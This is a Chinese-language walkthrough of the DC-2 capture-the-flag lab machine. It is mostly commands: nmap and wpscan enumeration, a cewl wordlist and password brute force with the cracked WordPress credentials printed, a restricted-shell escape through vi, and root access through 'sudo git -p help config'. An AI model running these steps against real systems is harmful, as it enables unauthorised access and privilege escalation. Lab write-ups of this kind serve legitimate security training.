1.信息收集

扫描存活主机

sudo arp-scan -l

扫描主机开放端口

nmap -p- 192.168.42.155

扫描主机开放端口的具体服务

nmap -p 80,7744 -sV -A 192.168.42.155

80端口是网页，7744是SSH

日常扫描指纹

whatweb 192.168.42.155

2.漏洞挖掘

访问网站，发现无法访问，猜测为hosts问题

改写host文件

vim /etc/hosts

192.168.42.155 dc-2

成功访问，开始逛街

点击flag，得到FLAG1

没东西了，开始扫扫路径

dirb http://dc-2/

发现一个登录框，是wordpass建站模板

先一个默认密码，没成功，再想想办法

找到一个专门找wp账号的工具

wpscan --url dc-2 -e u

找到三个用户，admin,jerry,tom

既然有账号，就有想办法得到密码，上cewl工具，

cwel http://dc-2 -w dict.txt

有了账号密码，开始爆破

爆破成功

tom

parturient

jerry

adipiscing

3.漏洞利用

登录两个账号看看

在jerry账号中page找到FLAG2

根据FLAG2的内容，我们尝试ssh登录

ssh服务在7744

ssh [email protected] -p 7744

cat 发现报错（-rbash）

rbash,即受限制的 bash,其可以用作中转服务器（实际上rbash只是bash的一软链接）。它与一般shell的区别在于会限制一些行为，让一些命令无法执行。

于是查找可用命令

echo $PATH

echo /home/tom/usr/bin/*

只有less,ls,scp,vi

命令太少，尝试rbash逃逸

export

显示环境变量

输入以下命令

vi shell

:set shell=/bin/sh
:shell

$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin/

逃逸成功，查看flag3.txt

理解内容，他让su用户

.

4.提升权限

找一下新的FLAG4

find / -name *flag*

还有FLAG，开始提权

常规命令

find / -perm -u=s -type f 2>/dev/null

发现没什么特殊的，换命令

发现git命令

sudo -l

不会用，有网站

查一下git

找一条你喜欢的命令

sudo git -p help config

！/bin/sh

提权成功，拿到全部FLAG

cat /root/final-flag.txt